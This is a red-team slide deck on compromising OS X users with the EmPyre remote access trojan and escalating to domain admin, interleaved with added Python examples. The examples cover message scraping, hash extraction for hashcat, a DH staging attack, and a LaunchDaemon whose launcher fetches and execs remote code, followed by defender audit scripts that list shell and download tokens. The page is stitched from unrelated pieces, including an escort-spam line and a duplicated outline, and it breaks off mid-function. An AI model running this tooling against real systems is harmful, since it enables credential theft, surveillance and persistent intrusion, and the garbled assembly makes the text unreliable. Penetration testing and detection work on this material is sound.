External to DA, the OS X Way
Operating in an OS X-heavy environment
Contents
 Introduction
 Overview
 Tradecraft Preparation
 Challenges
 The Agent
 Phishing
 Situational Awareness: Host Enumeration
 Privilege Escalation
 Persistence
 Situational Awareness: Network and User Enumeration
 Lateral Movement
Introductions
 Alex Rymdeko-Harvey is a former US Army Soldier who recently transitioned
out of the service and currently works in the Adaptive Threat Division at Veris
Group as a Penetration Tester and Red Teamer. Alex has a wide range of
skills and experience from offensive and defensive operations across
today's attack surface.
 Steve Borosh is a long-time security enthusiast. Prior: U.S. Army Infantry
Combat Veteran and private security contractor. Currently working as a
Penetration Tester, Red Teamer and Instructor with Veris Group’s Adaptive
Threat Division. Steve enjoys bug hunting, building useful security tools and
teaching.
Overview
• Typical penetration tests cover Windows / Linux
• Assessments become mundane
• Client approaches with a large OS X user-base
• Use common methodologies with new tools and techniques
adapted for OS X
• Utilize EmPyre, a Remote Access Trojan based off of the Empire
framework
Adversarial Use
• WireLurker (Trojanized applications, infects connected iOS devices)
• XcodeGhost (Infected Xcode package distributed in China)
• Hacking Team (Remote Control System compromise platform)
• OceanLotus (Flash dropper, downloads a Mach-O binary)
• KeRanger (Ransomware, infected Transmission package)
The Scenario
• A client requests an external penetration test against their corporate
infrastructure.
• Phishing with payloads may be conducted with email addresses
harvested from publicly available sources.
• 90% of users utilize OS X with several developers using Windows
Scenario: Goals
• Phish OS X users
• Elevate local privileges
• Move Laterally if needed
• Gain control of the Active Directory domain
Tradecraft Preparation
• Planning and Preparation
• Right tools for the job
• Live off the land
• pbpaste
• screencapture
• Native vs Non-Native
• Methodology
• Reconnaissance
• Exploitation (gain access)
• Situational Awareness
• Escalate Privileges
• Establish Persistence
• Lateral Movement
[Diagram: methodology cycle. Gain Access → Situational Awareness → Escalate Privileges → Establish Persistence → Lateral Movement]
Challenges
 Limited information on operating in OS X environments
 No open-sourced asynchronous Remote Access Trojan (RAT)
 Lateral Spread
 OS X/Linux
 Windows
 Less phishing payloads available
 No OLE
 Less executable types
The Agent: EmPyre
 Remote Access Trojan (RAT)
 Python (core developed by @harmj0y) based on the Empire project
 Asynchronous C2
 Secure Diffie-Hellman exchange communications
 Post-Exploitation modules
 OS X/Linux
 Launcher detects Little Snitch (host firewall) before calling back
The Agent: EmPyre
 The Diffie Hellman implementation is from Mark Loiseau's project at
https://github.com/lowazo/pyDHE, licensed under version 3.0 of the
GNU General Public License.
 The AES implementation is adapted from Richard Moore's project at
https://github.com/ricmoo/pyaes, licensed under the MIT license.
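The staging exchange the EmPyre slides describe (an ephemeral Diffie-Hellman agreement whose shared secret becomes the AES session key), as an added example that is not EmPyre's own code. It uses the 2048-bit MODP group from RFC 3526 and assumes one design detail the slides do not state: that each side's public value is tagged with an HMAC under a pre-shared staging key, the key an Empire-style launcher carries. The third run shows why that key matters: bare DH is unauthenticated, so whoever holds the staging key (for instance recovered from a captured phishing payload) can sit in the middle and read every tasking. The staging key value below is a constructed placeholder.

```python
import hashlib
import hmac
import secrets

# 2048-bit MODP group from RFC 3526 (group 14), generator 2.
P = int("".join("""
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE45B3D C2007CB8 A163BF05
98DA4836 1C55D39A 69163FA8 FD24CF5F 83655D23 DCA3AD96 1C62F356 208552BB
9ED52907 7096966D 670C354E 4ABC9804 F1746C08 CA18217C 32905E46 2E36CE3B
E39E772C 180E8603 9B2783A2 EC07A28F B5C55DF0 6F4C52C9 DE2BCBF6 95581718
3995497C EA956AE5 15D22618 98FA0510 15728E5A 8AACAA68 FFFFFFFF FFFFFFFF
""".split()), 16)
G = 2
ELEM_LEN = 256  # bytes needed to encode one group element

# Constructed pre-shared staging key (hypothetical; a real launcher embeds the server's).
STAGING_KEY = b"demo-staging-key-not-a-real-one"


def dh_keypair():
    """Ephemeral exponent and public value. 256 random bits is ample for a 2048-bit group."""
    priv = secrets.randbits(256) | 1
    return priv, pow(G, priv, P)


def staging_tag(staging_key, pub):
    """HMAC over the public value under the staging key, so only a holder of that key
    can originate (or substitute) a public value the peer will accept."""
    return hmac.new(staging_key, pub.to_bytes(ELEM_LEN, "big"), "sha256").digest()


def session_key(priv, peer_pub):
    """Shared secret hashed down to a 32-byte AES key. Public values of 0, 1 or p-1
    collapse the secret to a known constant, so they are rejected first."""
    if not 2 <= peer_pub <= P - 2:
        raise ValueError("degenerate DH public value")
    shared = pow(peer_pub, priv, P)
    return hashlib.sha256(shared.to_bytes(ELEM_LEN, "big")).digest()


def accept(priv, staging_key, peer_pub, peer_tag):
    """Receiver side: verify the staging tag in constant time, then derive."""
    if not hmac.compare_digest(staging_tag(staging_key, peer_pub), peer_tag):
        raise ValueError("staging tag mismatch: wrong staging key or swapped public value")
    return session_key(priv, peer_pub)


def handshake(agent_staging_key, server_staging_key, mitm_staging_key=None):
    """Run agent <-> server staging. If mitm_staging_key is given, an on-path attacker
    holding that key replaces both public values with its own and re-tags them.
    Returns the session key each party ended up with."""
    a_priv, a_pub = dh_keypair()
    s_priv, s_pub = dh_keypair()
    m_priv, m_pub = dh_keypair()

    # Stage 1: agent -> server, public value plus staging tag.
    pub, tag = a_pub, staging_tag(agent_staging_key, a_pub)
    if mitm_staging_key is not None:
        pub, tag = m_pub, staging_tag(mitm_staging_key, m_pub)
    server_key = accept(s_priv, server_staging_key, pub, tag)

    # Stage 2: server -> agent, same shape in the other direction.
    pub, tag = s_pub, staging_tag(server_staging_key, s_pub)
    if mitm_staging_key is not None:
        pub, tag = m_pub, staging_tag(mitm_staging_key, m_pub)
    agent_key = accept(a_priv, agent_staging_key, pub, tag)

    keys = {"agent": agent_key, "server": server_key}
    if mitm_staging_key is not None:
        # The attacker ends up holding one session with each victim.
        keys["mitm_agent_side"] = session_key(m_priv, a_pub)
        keys["mitm_server_side"] = session_key(m_priv, s_pub)
    return keys


if __name__ == "__main__":
    ok = handshake(STAGING_KEY, STAGING_KEY)
    print("honest staging, keys match:", ok["agent"] == ok["server"])
    try:
        handshake(STAGING_KEY, STAGING_KEY, mitm_staging_key=b"guessed-wrong")
    except ValueError as err:
        print("attacker without the staging key:", err)
    mitm = handshake(STAGING_KEY, STAGING_KEY, mitm_staging_key=STAGING_KEY)
    print("attacker with the staging key, victims share a key:", mitm["agent"] == mitm["server"])
```

The exchange gives each agent its own session key, but the staging key is the root of trust: it ships inside every launcher, so treat a recovered phishing payload as a compromised key and rotate it, and on the defensive side that key is what lets an analyst decrypt captured staging traffic.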
Phishing
 Previous Tradecraft
 Browser Exploits
 Java Payloads
 OLE Documents
 Macro Payloads
Phishing: Payload Generation
 2015-7007 HTML Applescript launcher
 OS X Microsoft Office Macro
 Supports 2011
 2016 = “Sandbox”
Payload Generation
Situational Awareness: Host
 Previous Tradecraft
 PowerShell
 WMI
 PowerUp
 Cobalt Strike Beacon modules
 Meterpreter modules
 The core of knowing your land
 How do we priv-esc?
Situational Awareness: Host
 Keylog
 Keychain Dump
 Clipboard Monitoring
 Scrape Messages
 Hash Dump
 Browser Dump
Situational Awareness: Keylogging
 Requires an elevated context
 Vital portion of our post-exploitation tradecraft
Situational Awareness: Clipboard Monitoring
 Non-Native method
 Native pbpaste may be signatured by Carbon Black
 Out to file
Situational Awareness: Keychain Dump
 Cleartext keychain dump
 Versions prior to OS X El Capitan
 Inspired by / adapted from Juuso's keychaindump:
https://github.com/juuso/keychaindump
Situational Awareness: Search Messages
 Scrapes Message.app DB
 iMessage, Jabber, Google Talk,
Yahoo, AIM
 Enumerate the last X messages
 Account
 Service
 Number
 Message
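The query behind the search-messages slide, as an added example (not EmPyre's module). Messages.app keeps its history in a SQLite database under ~/Library/Messages (chat.db); the two tables needed are `message` and `handle`, and the catch a practitioner hits is the timestamp, which is Mac absolute time (seconds since 2001-01-01, nanoseconds on later releases), not a Unix epoch. Only the columns used are modelled and the rows are constructed sample data, so the example runs offline without a real chat.db.

```python
import sqlite3
from datetime import datetime, timedelta

MAC_EPOCH = datetime(2001, 1, 1)

# Constructed sample history: (counterpart, service, is_from_me, text, mac absolute time).
SAMPLE_ROWS = [
    ("+15551234567", "iMessage", 0, "vpn password is Summer2016!", 484000000),
    ("alice@example.org", "Jabber", 1, "sent you the build server creds", 484000120),
    ("+15559876543", "SMS", 0, "lunch?", 483999000),
    ("+15551234567", "iMessage", 1, "thanks, got in", 484000200),
]


def mac_time(raw):
    """chat.db dates are seconds since 2001-01-01 UTC. Later OS releases store
    nanoseconds instead; anything too large to be seconds is rescaled."""
    if raw > 10 ** 11:
        raw = raw / 1e9
    return MAC_EPOCH + timedelta(seconds=raw)


def build_sample_db():
    """In-memory stand-in for chat.db with the subset of the real schema used here."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE handle (ROWID INTEGER PRIMARY KEY, id TEXT NOT NULL, service TEXT NOT NULL);
        CREATE TABLE message (ROWID INTEGER PRIMARY KEY, handle_id INTEGER, text TEXT,
                              date INTEGER, is_from_me INTEGER);
    """)
    handles = {}
    for account, service, from_me, text, ts in SAMPLE_ROWS:
        key = (account, service)
        if key not in handles:  # one handle row per (address, service), as in Messages.app
            handles[key] = con.execute(
                "INSERT INTO handle (id, service) VALUES (?, ?)", key).lastrowid
        con.execute("INSERT INTO message (handle_id, text, date, is_from_me) VALUES (?, ?, ?, ?)",
                    (handles[key], text, ts, from_me))
    con.commit()
    return con


def _fetch(con, where="1", params=(), limit=10):
    # `where` is only ever one of the fixed fragments below; user input goes through params.
    sql = f"""SELECT h.id, h.service, m.is_from_me, m.text, m.date
              FROM message m JOIN handle h ON m.handle_id = h.ROWID
              WHERE {where} ORDER BY m.date DESC LIMIT ?"""
    rows = con.execute(sql, (*params, limit)).fetchall()
    return [{"account": acct, "service": svc, "direction": "out" if from_me else "in",
             "when": mac_time(ts).strftime("%Y-%m-%d %H:%M:%S"), "message": text}
            for acct, svc, from_me, text, ts in rows]


def recent_messages(con, limit=10):
    """The slide's 'last X messages' listing: account, service, direction, time, text."""
    return _fetch(con, limit=limit)


def search_messages(con, term, limit=10):
    """Keyword search (SQLite LIKE is case-insensitive for ASCII), newest first."""
    return _fetch(con, "m.text LIKE ?", (f"%{term}%",), limit)


if __name__ == "__main__":
    db = build_sample_db()
    for row in recent_messages(db, 3):
        print(row)
    print(search_messages(db, "password"))
```

Against a live machine the agent opens the real file read-only (`sqlite3.connect("file:...chat.db?mode=ro", uri=True)`), which also avoids touching the write-ahead log; the same two queries are what a responder would run to scope what an intruder could have read.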
Situational Awareness: Hashdump
 Local Hashes
 Hashcat format ready!
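What "hashcat format ready" means in practice, as an added example that is not EmPyre's hashdump module. Local user records on OS X 10.8 and later carry a ShadowHashData entry: an array holding a binary plist whose SALTED-SHA512-PBKDF2 dict stores the salt, the iteration count and the 128-byte PBKDF2 output Apple calls "entropy". Reading the real records under /var/db/dslocal/nodes/Default/users/ needs root; the record below is constructed from a known password so the example runs offline. The output line follows hashcat mode 7100 ($ml$iterations$salt$entropy), which takes the first 64 bytes of the entropy.

```python
import hashlib
import hmac
import os
import plistlib


def make_shadow_hash_data(password, salt=None, iterations=35460):
    """Constructed ShadowHashData for a known password, in the on-disk layout:
    an array with one binary plist wrapping the SALTED-SHA512-PBKDF2 dict."""
    salt = salt or os.urandom(32)
    entropy = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=128)
    inner = {"SALTED-SHA512-PBKDF2": {"entropy": entropy, "salt": salt, "iterations": iterations}}
    return [plistlib.dumps(inner, fmt=plistlib.FMT_BINARY)]


def parse_shadow_hash_data(shadow):
    """Unwrap the nested binary plist and return (iterations, salt, entropy)."""
    for blob in shadow:
        inner = plistlib.loads(blob)
        if "SALTED-SHA512-PBKDF2" in inner:
            d = inner["SALTED-SHA512-PBKDF2"]
            return int(d["iterations"]), bytes(d["salt"]), bytes(d["entropy"])
    raise ValueError("no SALTED-SHA512-PBKDF2 entry (pre-10.8 record?)")


def hashcat_line(username, shadow):
    """user:$ml$<iterations>$<salt hex>$<entropy hex>, for `hashcat -m 7100 --username`."""
    iters, salt, entropy = parse_shadow_hash_data(shadow)
    return f"{username}:$ml${iters}${salt.hex()}${entropy[:64].hex()}"


def check_password(shadow, candidate):
    """Offline verification of one guess: recompute PBKDF2-HMAC-SHA512 with the stored
    salt and iteration count and compare in constant time."""
    iters, salt, entropy = parse_shadow_hash_data(shadow)
    derived = hashlib.pbkdf2_hmac("sha512", candidate.encode(), salt, iters, dklen=128)
    return hmac.compare_digest(derived, entropy)


if __name__ == "__main__":
    record = make_shadow_hash_data("Summer2016!")
    print(hashcat_line("alice", record))
    print("correct guess:", check_password(record, "Summer2016!"))
    print("wrong guess:  ", check_password(record, "Winter2016!"))
```

The iteration count is per user and typically in the tens of thousands, so cracking is slow per guess; that is the argument for going after the keychain and clipboard first and reserving the hashes for a small, targeted wordlist.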
Situational Awareness: Browser Dump
 Dump Chrome
 Dump Safari
 Specify length of output
Privilege Escalation
 Sudo Spawn
Persistence
 Previous Tradecraft
 Windows
 Registry
 Startup Folders
 WMI
 DLL Hijack
 Net user /add
 Linux
 Crontab
 adduser
Persistence
 Login Hooks
 Login persistence
 Crontab
 Hourly persistence
 LaunchDaemon
 Reboot persistence
 DyLib Hijacking
 Application start persistence
Persistence: Login Hook - User Context
Persistence
 Mac Login Hooks
 Bash / Applescript execution
 Accessible to all users
 Uses the defaults tool to set LoginHook in the com.apple.loginwindow
domain
Persistence: Crontab
 Set persistence by time
 Requires file on disk
Persistence: Launch Daemon
 Requires Sudo
 Spawns on reboot
 Spawns on agent loss
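The LaunchDaemon and login-hook slides above, as an added example that is not EmPyre's persistence module. The first function builds the property list a LaunchDaemon needs: RunAtLoad is the reboot persistence and KeepAlive is what makes launchd respawn the job when the agent dies. The second is the defender's side of the same file, the traits an auditor of /Library/LaunchDaemons would flag, and the third reads the LoginHook key that `defaults write com.apple.loginwindow LoginHook` sets. The label, launcher path and URL are hypothetical values constructed for the example.

```python
import os
import plistlib

# Hypothetical job label and launcher, constructed for this example.
LABEL = "com.example.softwareupdate"
LAUNCHER = ["/usr/bin/python", "-c",
            "import urllib2;exec(urllib2.urlopen('http://127.0.0.1:8080/stage').read())"]


def launch_daemon_plist(label, program_args, run_at_load=True, keep_alive=True):
    """Property list for /Library/LaunchDaemons/<label>.plist (root is needed to install it
    and to `launchctl load` it). RunAtLoad starts the job at boot; KeepAlive makes launchd
    restart it whenever the process exits, which is what 'spawns on agent loss' means."""
    job = {"Label": label, "ProgramArguments": list(program_args),
           "RunAtLoad": bool(run_at_load), "KeepAlive": bool(keep_alive)}
    return plistlib.dumps(job)


INTERPRETERS = ("python", "osascript", "bash", "sh", "zsh", "perl", "ruby", "curl")
SYSTEM_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/Library/Apple/")


def audit_launch_job(blob):
    """Return the traits that make a launchd job worth a look. An empty list means none
    of the heuristics fired, not that the job is clean."""
    job = plistlib.loads(blob)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    if not args:
        return ["job has no Program or ProgramArguments"]
    findings = []
    exe = os.path.basename(args[0])
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive (survives reboot and process kill)")
    if exe.startswith(INTERPRETERS):
        findings.append(f"launches an interpreter: {exe}")
    if any(a in ("-c", "-e") for a in args[1:]):
        findings.append("inline code passed on the command line")
    if any("http://" in a or "https://" in a for a in args[1:]):
        findings.append("URL in arguments (stages from the network)")
    if job.get("Label", "").startswith("com.apple.") and not args[0].startswith(SYSTEM_PREFIXES):
        findings.append("Apple-looking label but executable outside system paths")
    return findings


def login_hooks(loginwindow_prefs):
    """Login hook check over the parsed com.apple.loginwindow preferences (the dict
    `defaults read com.apple.loginwindow` or plistlib.load would give you)."""
    return {k: loginwindow_prefs[k] for k in ("LoginHook", "LogoutHook") if k in loginwindow_prefs}


if __name__ == "__main__":
    blob = launch_daemon_plist(LABEL, LAUNCHER)
    print(blob.decode())
    for finding in audit_launch_job(blob):
        print("finding:", finding)
    print(login_hooks({"LoginHook": "/Users/Shared/.hook.sh", "TALLogoutSavesState": False}))
```

The same audit applies to ~/Library/LaunchAgents, which needs no root and is where a user-context agent lands; keying only on KeepAlive misses crontab and login-hook persistence, so the loginwindow check and a look at `crontab -l` for each user belong in the same sweep.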
Persistence: Dylib Hijacking
 Hijack Scanner Module
 Based on @patrickwardle research
Persistence: Dylib Hijacking
 Hijacked Xcode
Situational Awareness: Network
 Previous Tradecraft
 Arp
 Nmap
 Net Commands
 EyeWitness
 PowerView
Situational Awareness: Network
 Group Policy Preferences
 Active Directory Queries
 Port Scanning
 Web Discovery
Situational Awareness: Active Directory
Modules
 situational_awareness/network/active_directory/get_computers
 situational_awareness/network/active_directory/get_domaincontrollers
 situational_awareness/network/active_directory/get_fileservers
 situational_awareness/network/active_directory/get_groupmembers
 situational_awareness/network/active_directory/get_groupmemberships
 situational_awareness/network/active_directory/get_groups
 situational_awareness/network/active_directory/get_ous
 situational_awareness/network/active_directory/get_userinformation
 situational_awareness/network/active_directory/get_users
Situational Awareness: GPP
 Group Policy Preferences
 Pulls “encrypted” cpassword values from SYSVOL (the AES key is published by Microsoft, so they decrypt trivially)
 MS14-025
https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py
Situational Awareness: Finding the Domain Controller
Situational Awareness: LDAP Queries
 Utilizes LDAP queries to pull objects such as computers, users, groups
and more from Active Directory.
Situational Awareness: Web Services
 find_fruit module
 Checks for possible vulnerable web applications
 Tomcat
 jboss
 idrac
 Apache Axis2
 etc..
Lateral Movement
 Previous Tradecraft
 Linux
 SSH
 Telnet
 Exploitation
 Windows
 PSEXEC
 WMI
 Exploitation
 RDP
Lateral Movement
 Windows
 Pivot to “Empire”
 Exploit Web Services
Lateral Movement
 Linux/OS X
 SSH Commands
 SSH Launcher
Honorable Mention: REST API
 EmPyre implements the same RESTful API specification as Empire
 https://github.com/PowerShellEmpire/Empire/wiki/RESTful-API
 External users/projects can fully control an EmPyre server in a
predictable way via REST requests
 This opens the possibility for web front ends, Android apps, multi-
player CLI UIs, and more
What’s next
 Socks Proxy
 Community Modules
 More Exploitation Modules
 Merge with Empire
Thanks to @harmj0y, @xorrior, @CptJesus for their contributions to this
effort!
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 

External to DA, the OS X Way

  • 8. Tradecraft Preparation
    ◦ Planning and preparation: the right tools for the job; live off the land (pbpaste, screencapture); native vs non-native tooling
    ◦ Methodology: reconnaissance; exploitation (gain access); situational awareness; escalate privileges; establish persistence; lateral movement
    ◦ [Diagram: Gain Access → Situational Awareness → Escalate Privileges → Establish Persistence → Lateral Movement]
  • 9. Challenges
    ◦ Limited information on operating in OS X environments
    ◦ No open-sourced asynchronous Remote Access Trojan (RAT)
    ◦ Lateral spread differs between OS X/Linux and Windows
    ◦ Fewer phishing payloads available: no OLE, fewer executable types
  • 11. The Agent: EmPyre
    ◦ Remote Access Trojan (RAT)
    ◦ Python; core developed by @harmj0y, based on the Empire project
    ◦ Asynchronous C2
    ◦ Diffie-Hellman key exchange secures agent communications
    ◦ Post-exploitation modules for OS X/Linux
    ◦ Launcher detects Little Snitch
  • 12. The Agent: EmPyre
    ◦ The Diffie-Hellman implementation is from Mark Loiseau's project at https://github.com/lowazo/pyDHE, licensed under version 3.0 of the GNU General Public License.
    ◦ The AES implementation is adapted from Richard Moore's project at https://github.com/ricmoo/pyaes, licensed under the MIT license.
  • 13. Phishing
    ◦ Previous tradecraft: browser exploits; Java payloads; OLE documents; macro payloads
  • 14. Phishing: Payload Generation
    ◦ 2015-7007 HTML AppleScript launcher
    ◦ OS X Microsoft Office macro: supports Office 2011; Office 2016 = "sandbox"
  • 16. Situational Awareness: Host
    ◦ Previous tradecraft: PowerShell; WMI; PowerUp; Cobalt Strike Beacon modules; Meterpreter modules
    ◦ The core of knowing your land: how do we priv-esc?
  • 17. Situational Awareness: Host
    ◦ Keylog; keychain dump; clipboard monitoring; scrape messages; hash dump; browser dump
  • 18. Situational Awareness: Keylogging
    ◦ Elevated context
    ◦ A vital part of post-exploitation tradecraft
  • 19. Situational Awareness: Clipboard Monitoring
    ◦ Non-native method: the native pbpaste may be signatured by Carbon Black
    ◦ Output to file
  • 20. Situational Awareness: Keychain Dump
    ◦ Cleartext keychain dump for versions prior to OS X El Capitan
    ◦ Inspired by / adapted from Juuso: https://github.com/juuso/keychaindump
  • 21. Situational Awareness: Search Messages
    ◦ Scrapes the Messages.app DB (iMessage, Jabber, Google Talk, Yahoo, AIM)
    ◦ Enumerates X messages: account, service, number, message
  • 22. Situational Awareness: Hashdump
    ◦ Local hashes, hashcat format ready!
  • 23. Situational Awareness: Browser Dump
    ◦ Dump Chrome; dump Safari; specify length of output
  • 25. Persistence
    ◦ Previous tradecraft, Windows: registry; startup folders; WMI; DLL hijack; net user /add
    ◦ Previous tradecraft, Linux: crontab; adduser
  • 26. Persistence
    ◦ Login hooks: login persistence
    ◦ Crontab: hourly persistence
    ◦ LaunchDaemon: reboot persistence
    ◦ Dylib hijacking: application-start persistence
  • 27. Persistence: Login Hook (User-Context Persistence)
    ◦ Mac login hooks: bash / AppleScript execution
    ◦ Accessible to all users
    ◦ Uses the "defaults" tool to set com.apple.loginwindow LoginHook
  • 28. Persistence: Crontab
    ◦ Set persistence by time
    ◦ Requires a file on disk
  • 29. Persistence: Launch Daemon
    ◦ Requires sudo
    ◦ Spawns on reboot
    ◦ Spawns on agent loss
  • 30. Persistence: Dylib Hijacking
    ◦ Hijack scanner module, based on @patrickwardle's research
  • 32. Situational Awareness: Network
    ◦ Previous tradecraft: arp; nmap; net commands; EyeWitness; PowerView
  • 33. Situational Awareness: Network
    ◦ Group Policy Preferences; Active Directory queries; port scanning; web discovery
  • 34. Situational Awareness: Active Directory Modules
    ◦ situational_awareness/network/active_directory/get_computers
    ◦ situational_awareness/network/active_directory/get_domaincontrollers
    ◦ situational_awareness/network/active_directory/get_fileservers
    ◦ situational_awareness/network/active_directory/get_groupmembers
    ◦ situational_awareness/network/active_directory/get_groupmemberships
    ◦ situational_awareness/network/active_directory/get_groups
    ◦ situational_awareness/network/active_directory/get_ous
    ◦ situational_awareness/network/active_directory/get_userinformation
    ◦ situational_awareness/network/active_directory/get_users
  • 35. Situational Awareness: GPP
    ◦ Group Policy Preferences: pulls "encrypted" passwords from SYSVOL (MS14-025)
    ◦ https://raw.githubusercontent.com/leonteale/pentestpackage/master/Gpprefdecrypt.py
  • 36. Situational Awareness: Finding the Domain Controller
  • 37. Situational Awareness: LDAP Queries
    ◦ Utilizes LDAP queries to pull objects such as computers, users, groups and more from Active Directory.
  • 38. Situational Awareness: Web Services
    ◦ find_fruit module: checks for possibly vulnerable web applications (Tomcat, JBoss, iDRAC, Apache Axis2, etc.)
  • 39. Lateral Movement
    ◦ Previous tradecraft, Linux: SSH; Telnet; exploitation
    ◦ Previous tradecraft, Windows: PsExec; WMI; exploitation; RDP
  • 40. Lateral Movement
    ◦ Windows: pivot to "Empire"; exploit web services
  • 41. Lateral Movement
    ◦ Linux/OS X: SSH commands; SSH launcher
  • 42.
  • 43. Honorable Mention: REST API
    ◦ EmPyre implements the same RESTful API specification as Empire: https://github.com/PowerShellEmpire/Empire/wiki/RESTful-API
    ◦ External users/projects can fully control an EmPyre server in a predictable way through REST requests
    ◦ This opens the possibility for web front ends, Android apps, multi-player CLI UIs, and more
  • 44. What's next
    ◦ SOCKS proxy; community modules; more exploitation modules; merge with Empire
    ◦ Thanks to @harmj0y, @xorrior, @CptJesus for their contributions to this effort!
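The three persistence mechanisms on slides 27 to 29 (the com.apple.loginwindow LoginHook set with "defaults", a crontab entry, and a LaunchDaemon that respawns on reboot and on agent loss) all leave artifacts a defender can audit. The following is an added example written for this page, not EmPyre code and not from the talk: it parses constructed plist and crontab data (the script paths, the label com.apple.updates.helper and the staging directories are hypothetical) and reports what an incident responder should look at first.

```python
"""Audit three macOS persistence locations from the slides: the loginwindow
LoginHook, crontab entries and LaunchDaemon plists.  Added defender example,
not EmPyre code; every input is constructed in-line so it runs offline, and
the paths and labels are hypothetical."""
import plistlib

# Constructed: what plistlib reads from /Library/Preferences/com.apple.loginwindow.plist
# after `defaults write com.apple.loginwindow LoginHook <script>` (the slide's mechanism).
LOGINWINDOW_PLIST = plistlib.dumps({
    "LoginHook": "/Users/Shared/.cache/login.sh",   # hypothetical script path
    "LogoutHook": "",
})

# Constructed `crontab -l` output for one user; the hourly entry mirrors slide 26.
CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/bin/python /tmp/.x/agent.py
30 2 * * 1 /usr/local/bin/backup --weekly
"""

# Constructed LaunchDaemon plist as launchctl would load it from
# /Library/LaunchDaemons; RunAtLoad + KeepAlive produce the "spawns on reboot /
# spawns on agent loss" behaviour slide 29 describes.
LAUNCHD_PLIST = plistlib.dumps({
    "Label": "com.apple.updates.helper",            # hypothetical, Apple-looking
    "ProgramArguments": ["/usr/bin/python", "/Users/Shared/.cache/agent.py"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

# World-writable or user-owned staging directories, and interpreter/downloader
# tokens that rarely belong in system persistence entries.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
SUSPICIOUS_TOKENS = ("curl ", "python", "osascript", "base64", "/dev/tcp")


def suspicious(cmdline):
    """True when a command line references a staging dir or a live interpreter."""
    return (any(d in cmdline for d in STAGING_DIRS)
            or any(t in cmdline for t in SUSPICIOUS_TOKENS))


def audit_loginhook(plist_bytes):
    """Return (key, script) for every hook set in com.apple.loginwindow.
    Any value is worth review: Apple deprecated login hooks in favour of
    launchd, so a clean system normally has none."""
    prefs = plistlib.loads(plist_bytes)
    return [(k, prefs[k]) for k in ("LoginHook", "LogoutHook") if prefs.get(k)]


def audit_crontab(text):
    """Return the command portion of crontab lines that look like staging."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)        # m h dom mon dow <command...>
        if len(fields) == 6 and suspicious(fields[5]):
            hits.append(fields[5])
    return hits


def audit_launchd(plist_bytes, plist_path):
    """Return (label, command line, reasons) for one launchd job."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    cmdline = " ".join(args)
    reasons = []
    if job.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if job.get("KeepAlive"):
        reasons.append("KeepAlive")
    if suspicious(cmdline):
        reasons.append("staging dir or interpreter in ProgramArguments")
    # Apple's own jobs ship under /System/Library; a com.apple.* label in the
    # third-party /Library/LaunchDaemons tree is a common masquerade.
    if (job.get("Label", "").startswith("com.apple.")
            and not plist_path.startswith("/System/")):
        reasons.append("Apple-looking label outside /System")
    return job.get("Label"), cmdline, reasons


if __name__ == "__main__":
    print(audit_loginhook(LOGINWINDOW_PLIST))
    print(audit_crontab(CRONTAB))
    print(audit_launchd(LAUNCHD_PLIST,
                        "/Library/LaunchDaemons/com.apple.updates.helper.plist"))
```

On a live host the same three functions would be fed by `defaults read com.apple.loginwindow`, `crontab -l` for each user, and every plist under /Library/LaunchDaemons and /Library/LaunchAgents; the slide's "requires sudo" for the LaunchDaemon case is exactly why a root-owned plist pointing into a user-writable directory deserves a second look.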
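Slide 30's hijack scanner is based on Patrick Wardle's dylib hijacking research, which identified two preconditions: a weak dylib (LC_LOAD_WEAK_DYLIB) whose library is absent, and an @rpath dylib that an earlier LC_RPATH search directory does not contain. The block below is an added example for auditing installed applications, not EmPyre's scanner module and not the talk's code; it parses a constructed `otool -l` transcript for a hypothetical Foo.app and uses a constructed set of present paths in place of the filesystem.

```python
"""Flag the two dylib-hijack preconditions from Patrick Wardle's research that
slide 30 references.  Added defender example, not EmPyre's scanner; the otool
transcript and the file list are constructed and Foo.app is hypothetical."""
import re

# Constructed excerpt of: otool -l /Applications/Foo.app/Contents/MacOS/Foo
OTOOL_L = """\
Load command 12
          cmd LC_LOAD_DYLIB
      cmdsize 56
         name /usr/lib/libSystem.B.dylib (offset 24)
Load command 13
          cmd LC_RPATH
      cmdsize 56
         path /Applications/Foo.app/Contents/Frameworks (offset 12)
Load command 14
          cmd LC_RPATH
      cmdsize 32
         path /Library/Frameworks (offset 12)
Load command 15
          cmd LC_LOAD_DYLIB
      cmdsize 48
         name @rpath/libcore.dylib (offset 24)
Load command 16
          cmd LC_LOAD_WEAK_DYLIB
      cmdsize 56
         name /usr/local/lib/libopt.dylib (offset 24)
"""

# Constructed stand-in for os.path.exists(): the paths that are present.
PRESENT = {
    "/usr/lib/libSystem.B.dylib",
    "/Library/Frameworks/libcore.dylib",
}

# otool prints "<field> <value> (offset N)" for names and rpaths, "cmd <TYPE>" for types.
FIELD = re.compile(r"^\s*(cmd|name|path)\s+(.*?)(?:\s+\(offset \d+\))?$")


def parse_load_commands(text):
    """Split otool -l output into one dict per load command, keeping the
    cmd type and the dylib name or rpath directory."""
    cmds = []
    for line in text.splitlines():
        if line.startswith("Load command"):
            cmds.append({})
            continue
        m = FIELD.match(line)
        if m and cmds:
            cmds[-1][m.group(1)] = m.group(2)
    return cmds


def find_hijack_candidates(text, present):
    """Return (kind, dylib reference, path that must stay non-writable):
    'weak-missing' for an absent weak dylib, 'rpath-order' for each LC_RPATH
    directory searched before the one that actually holds the library."""
    cmds = parse_load_commands(text)
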